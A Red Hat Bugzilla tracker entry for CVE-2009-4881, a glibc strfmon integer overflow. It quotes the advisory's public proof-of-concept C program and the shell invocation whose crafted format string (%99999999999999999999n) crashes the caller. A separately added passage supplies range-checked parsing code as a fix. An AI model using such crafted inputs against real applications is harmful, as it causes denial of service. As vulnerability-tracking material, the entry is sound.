Bug 599095 - (CVE-2009-4881) CVE-2009-4881 glibc (32-bit): Integer overflow in the __vstrfmon_l function
Status: CLOSED NOTABUG
Product: Security Response
Classification: Other
Component: vulnerability
Assigned To: Red Hat Product Security
http://securityreason.com/achievement...
impact=none,source=cve,reported=20100...
Reported: 2010-06-02 13:02 EDT by Jan Lieskovsky
Modified: 2016-03-04 07:49 EST (History)
Doc Type: Bug Fix
Last Closed: 2011-02-04 14:04:14 EST
External Trackers: Sourceware 10600 (priority: none, status: none, summary: none, last updated: never)
Description Jan Lieskovsky 2010-06-02 13:02:24 EDT
Common Vulnerabilities and Exposures assigned an identifier CVE-2009-4881 to
the following vulnerability:

Integer overflow in the __vstrfmon_l function in stdlib/strfmon_l.c in
the strfmon implementation in the GNU C Library (aka glibc or libc6)
before 2.10.1 allows context-dependent attackers to cause a denial of
service (application crash) via a crafted format string, as
demonstrated by the %99999999999999999999n string, a related issue to
CVE-2008-1391.

References:
  [1] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
  [2] http://sourceware.org/git/?p=glibc.git;a=commit;h=153aa31b93be22e01b236375fb02a9f9b9a0195f
  [3] http://sources.redhat.com/bugzilla/show_bug.cgi?id=10600
  [4] http://securityreason.com/achievement_securityalert/53
  [5] http://xorl.wordpress.com/2009/04/11/cve-2008-1391-netbsd-strfmon-integer-overflow/

Public PoC (from [4]):

#include <stdio.h>
#include <monetary.h>
#include <sys/types.h>

int main(int argc, char *argv[])
{
    char buff[51];
    ssize_t res;

    if (argc < 2) {
        fprintf(stderr, "usage: %s <strfmon-format>\n", argv[0]);
        return 1;
    }
    /* The format string is taken straight from the command line; the
     * crafted width in the session below overflows the width accumulator
     * in glibc before 2.10.1. strfmon's %n conversion consumes a double,
     * so the value argument is 0.0 rather than the advisory's "0". */
    res = strfmon(buff, sizeof buff - 1, argv[1], 0.0);
    printf("strfmon returned %zd\n", res);
    return 0;
}

cxib# ./pln %99999999999999999999n
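The defect the CVE text describes is a decimal field width accumulated digit by digit with no range check, so a long run of digits wraps the int. The following is an added example, not code from this bug, the advisory or glibc, showing how a strfmon-style conversion parser rejects a width or precision that would not fit in an int; parse_decimal_checked, parse_strfmon_spec and the two wrapper names are assumed names.

```c
#include <limits.h>
#include <string.h>

/* Accumulate a run of decimal digits into an int without wrapping.
 * Returns 1 and advances *pp past the digits on success, 0 if the value
 * would exceed INT_MAX (the range check that was missing before 2.10.1). */
static int parse_decimal_checked(const char **pp, int *out)
{
    int value = 0;
    const char *p = *pp;
    while (*p >= '0' && *p <= '9') {
        int digit = *p - '0';
        if (value > (INT_MAX - digit) / 10)   /* value * 10 + digit > INT_MAX */
            return 0;
        value = value * 10 + digit;
        p++;
    }
    *pp = p;
    *out = value;
    return 1;
}

/* Parse one strfmon(3) conversion: %[flags][width][#left][.right]conv
 * (flags =f ^ + ( ! -; conversions i, n, %). Absent fields are set to -1.
 * Returns the conversion character, or -1 if the spec is malformed or a
 * numeric field does not fit in an int. */
int parse_strfmon_spec(const char *spec, int *width, int *left, int *right)
{
    const char *p = spec;
    *width = *left = *right = -1;
    if (*p++ != '%')
        return -1;
    for (;;) {                                      /* flag characters */
        if (*p == '=' && p[1] != '\0') p += 2;      /* =f: fill character f */
        else if (*p != '\0' && strchr("^+(!-", *p)) p++;
        else break;
    }
    if (*p >= '0' && *p <= '9' && !parse_decimal_checked(&p, width)) return -1;
    if (*p == '#') { p++; if (!parse_decimal_checked(&p, left)) return -1; }
    if (*p == '.') { p++; if (!parse_decimal_checked(&p, right)) return -1; }
    return (*p == 'i' || *p == 'n' || *p == '%') ? *p : -1;
}

/* Thin wrappers: conversion character, or the width (-2 on a rejected spec). */
int spec_conversion(const char *s) { int w, l, r; return parse_strfmon_spec(s, &w, &l, &r); }
int spec_width(const char *s) { int w, l, r; return parse_strfmon_spec(s, &w, &l, &r) < 0 ? -2 : w; }
```

With this check the advisory's 20-digit width is rejected at the tenth digit instead of being folded into a wrapped int, while a width of exactly INT_MAX is still accepted.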
Comment 4 Tomas Hoger 2010-09-14 11:05:05 EDT
Related CVE-2008-1391 was tracked via bug #524671. Related Fedora bugs with some more discussion of both bugs - bug #496386.
Comment 5 Tomas Hoger 2011-02-04 14:04:14 EST
For future reference, this issue is the glibc variant of the *BSD libc issue that was assigned the CVE-2008-1391 id, originally reported via SecurityReason Advisory 53. The glibc variant was reported via SecurityReason Advisory 67 along with another integer overflow in the printf implementation (CVE-2009-4880, bug #599070; see upstream bugzilla #10600 for details).

Both issues affecting glibc and reported in SecurityReason Advisory 67 are corrected in Red Hat Enterprise Linux 6 glibc packages.

Statement:

Red Hat does not consider this bug to be a security issue. A properly written application should not use arbitrary untrusted data as part of the format string passed to functions such as strfmon or the printf family of functions.
